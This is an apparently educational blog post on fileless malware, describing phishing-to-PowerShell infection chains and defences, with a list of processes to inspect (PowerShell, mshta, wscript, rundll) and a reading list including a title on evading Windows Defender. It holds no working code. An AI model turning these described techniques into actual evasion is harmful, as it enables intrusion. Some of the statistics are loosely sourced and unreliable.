FILELESS MALWARE ATTACKS
Unlike attacks carried out using traditional malware, fileless malware attacks don’t entail attackers installing software on a victim’s machine. This means that there’s NO signature for antivirus software to detect, greatly decreasing the effectiveness of these programs in detecting fileless malware attacks. And these attacks are almost 10 times more likely to succeed in infecting a machine than file-based attacks.
PS: Educational purposes 🙏
How Fileless Malware works
TRUE FILELESS MALWARE IS NON-PERSISTENT — ALL TRACES OF IT DISAPPEAR WHEN THE SYSTEM IS REBOOTED, MAKING FORENSIC INVESTIGATION DIFFICULT.
The notion of fileless malware has been gaining a lot of attention in the industry.
The majority of successful attacks are now fileless. Source: The Ponemon Institute
Explore search interest for fileless malware, Malware by time, location and popularity on Google Trends.
Unlike file-based attacks, fileless malware attacks DO NOT download malicious files or write content to disk. Attackers exploit application vulnerabilities to inject code directly into the memory space of an existing application. They can also leverage trusted office applications or administration tools native to Windows OS, such as PowerShell or Windows Management Instrumentation (WMI), to run scripts and load malicious code directly into memory. Like all attacks, the goal is to gain control of computers to achieve the attacker’s goal, such as destruction, distortion (ransomware), data/credential theft, or additional attacks.
As in the example illustrated above, a phishing email containing a link takes the user to an exploit-hosting site. The browser exploits triggers PowerShell running command line (script), then PowerShell follows the instructions to download additional script (typically a larger command line) from a remote site. The larger command line contains fileless malware that is assembled and runs directly in memory.
In a second example, a user may receive a phishing email with a .doc attachment containing a macro. If the user enables the macro, essentially a VBA script, it triggers the PowerShell script that downloads additional scripts containing fileless malware code from a remote location. It then injects that malicious code into the memory space of a vulnerable application.
Must read: how hacker hacked into the financial domain: https://d3pakblog.wordpress.com/2017/03/09/hacker-hacked-into-financial-domain/
69% of organizations don’t believe their antivirus can stop the threats they’re seeing.
Cyber Kill Chain: The seven steps of the Cyber Kill Chain enhance visibility into an attack and enrich an analyst’s understanding of an adversary’s tactics, techniques, and procedures.
Can Fileless Malware Be Stopped?
The risk of ransomware penetration and the business impact of a ransomware infection can both be reduced by implementing several conventional best practices. These can be split into two categories, general good practice and security best practice; these baseline protections are strongly recommended to any organization.
The problem is complex. To begin with, organizations have to realize that processes that run scripts, like Microsoft PowerShell, are just as capable of delivering malware as processes that execute them, like opening a PDF. Secondly, companies must make sure that their employees are educated about the dangers of opening ANY attachments that aren’t from known senders, and third, every patch issued by any vendor must be installed immediately. This includes, of course, the antivirus software on the system, as well as the operating system itself. Simple steps like these can prevent a lot of future pain. As per McAfee, Fileless threats continued to be a growing concern in Q3, with PowerShell malware growing by 119%.
With respect to emerging threat like ransomware so best practices from prime levels are Education awareness, Data Backup, Patching & update.
Fileless malware already presents a significant problem, and it’s gaining further popularity among attackers because it is virtually undetectable by traditional file-based prevention and detection techniques. Endpoint security tools, including so-called next-gen AV, don’t scrutinize scripts or command line, such as PowerShell scripts, and no file is written on the disk. Since traditional AV and so-called next-gen AV focus on static file analysis, fileless attacks can evade these AV tools without triggering alarms because no file is downloaded and saved to the disk.
Blocking File-Less Attacks
- Machine Learning & Algorithm: Suspicious traffic and file download
- Process Inspection: Need to review policies for specific arguments (PowerShell, mshta, wscript, cscript, rundll, autoit, regedit, office macro, browser spawn PowerShell or any process inject code in other processes memory space)
- Retrospective detection: Collect as much IoCs/IoA (Indicator of compromise/attacks) respect to threat campaign
- Studying the adversaries: Use intelligence baseline and seek out known tactics, techniques and procedures (TTPs) used by multiple adversarial groups
Read case study: Hacker who hacked hacking team
The SANS Security Maturity Model
The SANS Institute has developed a Maturity Model for Endpoint Security that clearly lays out a progression of defensive capabilities relating to end-user devices, which continue to be the source of approximately 70% of successful malware breaches.
Some tips to avoid fileless malware infections, from TechRepublic’s:
- Restrict unnecessary scripting languages
- Disable macros and digitally sign trusted macros
- Monitor security appliance logs for unauthorized traffic
- Implement endpoint security with active monitoring
- Perform patch management across all devices
By going through above security measures, it will reduce the chances of being a trap.
- Fileless Malware Tips
- Hiding Metasploit Shellcode to Evade Windows Defender
- Decoding Fileless Malware:
- Fileless malware- the ninja technique to spread malware using default OS tools
- Fileless Malware: Attack Trend Exposed
- FILELESS MALWARE 101: UNDERSTANDING NON-MALWARE ATTACKS
- Fileless Malware: A Hidden Threat
- Detecting Malicious PowerShell Commands using Deep Neural Networks
- Extract Shellcode from Fileless Malware like a Pro
- Must read: AGE OF THE CYBER HUNTER: HOW A NEW GENERATION OF THREATS CHANGED THE CYBERSECURITY PARADIGM
- Malware Analysis
- A curated list of awesome malware analysis tools and resources
Cryptominers have impacted 55% of organizations globally.